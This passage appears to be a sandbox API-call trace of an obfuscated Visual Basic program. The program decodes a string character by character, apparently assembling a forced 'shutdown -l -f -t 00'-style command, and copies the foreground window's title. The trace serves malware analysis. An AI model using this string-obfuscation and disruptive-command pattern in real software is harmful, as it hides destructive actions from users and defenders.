pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0175.622] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.623] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.623] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.624] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0175.624] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.625] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0175.629] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.629] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.630] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.630] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0175.631] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.631] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0175.632] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.632] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.632] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.633] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.633] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.634] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.634] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.634] GetForegroundWindow () returned 0x1011a [0175.635] GetLastError () returned 0x0 [0175.635] SysStringLen (param_1=" ") returned 0xff [0175.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0175.635] SysStringLen (param_1=" ") returned 0xff [0175.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0175.635] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0175.636] GetLastError () returned 0x0 [0175.636] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0175.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0175.636] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0175.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0175.636] SysStringLen (param_1="FolderView") returned 0xb [0175.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FolderView", cchWideChar=12, lpMultiByteStr=0x116859c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FolderView", lpUsedDefaultChar=0x0) returned 12 [0175.637] SetWindowTextA (hWnd=0x103c4, lpString="FolderView") returned 1 [0175.637] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0175.637] GetFocus () returned 0x0 [0175.637] lstrlenA (lpString="FolderView") returned 10 [0175.637] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0175.638] IsWindow (hWnd=0x103c4) returned 1 [0175.638] IsWindow (hWnd=0x103c4) returned 1 [0175.638] IsWindow (hWnd=0x103c4) returned 1 [0175.638] IsWindow (hWnd=0x103c4) returned 1 [0175.639] GetFocus () returned 0x0 [0175.639] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0175.639] GetFocus () returned 0x0 [0175.639] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xb) returned 0x10e1d20 [0175.639] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0xb, lParam=0x10e1d20) returned 0xa [0175.640] GetFocus () returned 0x0 [0175.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0175.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=11 | out: lpWideCharStr="FolderView") returned 11 [0175.640] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0175.640] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.889] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.889] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.890] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0175.920] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.920] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0175.920] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.924] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0175.925] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.925] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0175.926] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.927] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0175.927] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.927] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0175.928] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.928] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0175.929] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.929] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0175.929] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.930] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0175.930] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.931] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0175.931] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.932] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0175.932] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.933] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0175.933] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.933] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.934] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.934] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0175.935] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.935] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0175.936] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.936] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.936] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.942] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0175.942] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.942] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0175.943] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.943] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.944] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.944] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0175.945] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.945] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0175.946] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0175.946] WideCharToMultiByte (in: 